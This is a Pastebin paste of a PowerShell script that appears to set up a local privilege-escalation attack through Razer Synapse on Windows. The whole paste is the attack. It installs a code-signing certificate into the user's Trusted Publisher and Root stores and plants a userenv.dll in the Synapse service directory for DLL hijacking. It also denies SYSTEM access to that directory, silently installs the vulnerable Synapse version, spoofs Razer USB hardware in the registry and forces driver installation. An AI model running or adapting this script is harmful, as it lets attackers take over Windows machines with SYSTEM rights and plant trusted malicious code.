Advertisement
alice_killer

broshell

Nov 9th, 2024 (edited)
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ###------------------IMPORTING THE CERTIFICATE TO TRUSTED ZONE--------------------------------------
  2. # Define the path to your .pfx file
  3. $pfxPath = "C:\Temp\code_signing_cert.pfx"
  4.  
  5. # Import the certificate without a password into the current user's Trusted Root
  6. $pfx = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
  7. $pfx.Import($pfxPath, $null, [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::PersistKeySet)
  8.  
  9. # Add the certificate to the Trusted Publishers store
  10. $store = New-Object System.Security.Cryptography.X509Certificates.X509Store "TrustedPublisher", "CurrentUser"
  11. $store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
  12. $store.Add($pfx)
  13. $store.Close()
  14.  
  15. # (Optional) adding it to the Root store to fully trust it
  16. $rootStore = New-Object System.Security.Cryptography.X509Certificates.X509Store "Root", "CurrentUser"
  17. $rootStore.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
  18. $rootStore.Add($pfx)
  19. $rootStore.Close()
  20.  
  21.  
  22.  
  23.  
  24. #------------------Create the vulnerable directory--------------------
  25. # Define the directory path
  26. $directoryPath = 'C:\ProgramData\Razer\Synapse3\Service'
  27. New-Item -ItemType Directory -Path $directoryPath -Force
  28.  
  29. #Moving the dll file to the vulnerable direction. As an alternative solution, it's possible to download the file from a hosting server.
  30. Move-Item -Path "C:\Temp\userenv.dll" -Destination "C:\ProgramData\Razer\Synapse3\Service" -Force
  31.  
  32.  
  33. # Define the path to the directory
  34. $directoryPath = "C:\ProgramData\Razer\Synapse3\Service"
  35.  
  36. # Verify that the directory exists and block SYSTEM access
  37. if (Test-Path -Path $directoryPath) {
  38.     # Create a new Deny access rule for the SYSTEM account
  39.     $denyRule = New-Object System.Security.AccessControl.FileSystemAccessRule("SYSTEM", "FullControl", "Deny")
  40.  
  41.     # Directly modify the ACL to block access for SYSTEM
  42.     $acl = (Get-Item $directoryPath).GetAccessControl('Access')
  43.     $acl.AddAccessRule($denyRule)
  44.     (Get-Item $directoryPath).SetAccessControl($acl)
  45. }
  46.  
  47.  
  48.  
  49. # Define the path to the installer, as an alternative solution, it can be downloaded from a hosting server
  50. $installerPath = "C:\Temp\Razer_Synapse_3.6.exe"
  51. #Installing the Razer Synapse
  52. Start-Process -FilePath $installerPath -ArgumentList "/silent", "/quiet", "/norestart" -Wait
  53.  
  54.  
  55.  
  56. #------------------------------------EXtra effort which didn't trigger the driver installation-----------------------------
  57. #Emulate the hardware by setting the necessary registry keys
  58. $vendorID = "1532"
  59. $deviceID = "008A"
  60. $regPath = "HKLM:\SYSTEM\CurrentControlSet\Enum\USB\VID_$vendorID&PID_$deviceID"
  61.  
  62. # Create the registry structure to emulate the Razer hardware
  63. New-Item -Path $regPath -Force | Out-Null
  64. New-ItemProperty -Path $regPath -Name "DeviceDesc" -Value "Razer Virtual Mouse" -PropertyType String -Force | Out-Null
  65. New-ItemProperty -Path $regPath -Name "HardwareID" -Value "USB\VID_$vendorID&PID_$deviceID" -PropertyType MultiString -Force | Out-Null
  66.  
  67.  
  68. #_---------------------TO trigger the windows update----------------------------------------
  69. # Trigger Windows Update to check for new drivers
  70. $updateSession = New-Object -ComObject Microsoft.Update.Session
  71. $updateSearcher = $updateSession.CreateUpdateSearcher()
  72.  
  73. # Search for driver updates that are not yet installed
  74. $searchResult = $updateSearcher.Search("IsInstalled=0 and Type='Driver'")
  75.  
  76. # Check if any driver updates are found
  77. if ($searchResult.Updates.Count -gt 0) {
  78.     # Prepare to install all found driver updates
  79.     $updatesToInstall = New-Object -ComObject Microsoft.Update.UpdateColl
  80.     foreach ($update in $searchResult.Updates) {
  81.         $updatesToInstall.Add($update) | Out-Null
  82.     }
  83.    
  84.     # Install the updates
  85.     $installer = $updateSession.CreateUpdateInstaller()
  86.     $installer.Updates = $updatesToInstall
  87.     $installationResult = $installer.Install()
  88. }
  89.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement